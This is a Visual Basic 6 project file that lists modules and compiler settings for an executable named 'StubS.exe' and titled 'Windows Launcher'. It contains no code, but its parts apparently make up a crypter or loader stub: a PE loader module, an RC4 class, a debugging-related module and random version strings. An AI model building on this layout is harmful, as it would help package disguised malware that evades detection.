Type=Exe
Module=mPEL; mPEL.bas
Module=mMain; mMain.bas
Module=Dbgthis; Dbgthis.bas
Form=ASDx.frm
Class=C4; clsRC4.cls
IconForm="ASDx"
Startup="Sub Main"
HelpFile=""
Title="Windows Launcher"
ExeName32="StubS.exe"
Command32=""
Name="JKSDT93"
HelpContextID="0"
Description="GER764"
CompatibleMode="0"
MajorVer=6
MinorVer=38
RevisionVer=81
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Ux"
VersionCompanyName="vgrN0E"
VersionFileDescription="vh7XRybkk"
VersionLegalCopyright="YXP4"
VersionLegalTrademarks="OnBo"
VersionProductName="Fxy1K5Gu1"
CompilationType=0
OptimizationType=2
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=-1
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=-1
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
